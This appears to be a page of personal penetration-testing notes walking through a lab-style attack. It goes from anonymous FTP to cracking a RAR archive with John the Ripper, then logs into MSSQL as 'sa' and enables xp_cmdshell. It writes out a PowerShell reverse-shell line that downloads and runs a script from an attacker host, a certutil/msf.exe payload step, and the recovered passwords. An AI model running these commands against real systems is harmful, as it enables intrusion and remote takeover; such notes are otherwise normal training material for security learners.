FTP

The FTP Server allowed for anonymous access.

These are the files that were in the particular share.

Everything except the MSSQL_BAK.rar is garbage.

In order to extract files from the .rar file this is the command I used:

unrar -e MSSQL_BAK.rar /path/to/extract

The rar file was unfortunately password protected but this is nothing we can't handler because we got JohnTheRipper.

rar2john allows us to attack this password prompt and be able to crack the password.

Let me retrace some steps. 

rar2john MSSQL_BAK.rar > rar2john.txt
john john rar2john.txt --wordlist=/usr/share/wordliss/rockyou.txt
password is letmeinplease

After extracting we see that there is a password for the user sa. The password is EjectFrailtyThorn425.

Using sqsh and following my friends guide on how to get rce with sqsh

The syntax is as follows 

sqsh -S victim-ip -U sa -P password

exec sp_configure 'xp_cmdshell', 1
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1 
reconfigure 
go
xp_cmdshell whoami
go





output 


weoweo\wewo

We can get a revere shell if we do something like this: 

xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://192.168.119.177/Invoke-PowerShellTcp.ps1')"
go

or 

xp_cmdshell 'certutil blah blah blah"
go
then
xp_cmdshell 'cmd /c msf.exe'
go
PreviousOther ServicesNextSMB

Last updated